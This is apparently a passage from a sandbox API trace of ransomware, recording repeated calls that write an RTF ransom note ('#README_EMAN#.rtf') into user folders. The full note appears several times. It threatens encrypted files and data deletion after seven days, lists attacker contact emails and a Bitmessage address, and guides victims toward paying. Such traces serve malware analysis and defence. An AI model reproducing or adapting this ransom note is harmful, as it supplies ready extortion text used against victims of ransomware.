COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0278.579] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1ef5068, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nzráb\x95.ê©ÀAH\x01¹HÂP[w.\x80¬Ñ%cD", lpUsedDefaultChar=0x0) returned 8717 [0278.579] WriteFile (in: hFile=0x2c8, lpBuffer=0x1ef5068*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1ef5068*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0278.580] CloseHandle (hObject=0x2c8) returned 1 [0278.580] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\it\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\it\\#readme_eman#.rtf")) returned 0xffffffff [0278.580] GetLastError () returned 0x2 [0278.580] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\it\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\it\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c8 [0278.580] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 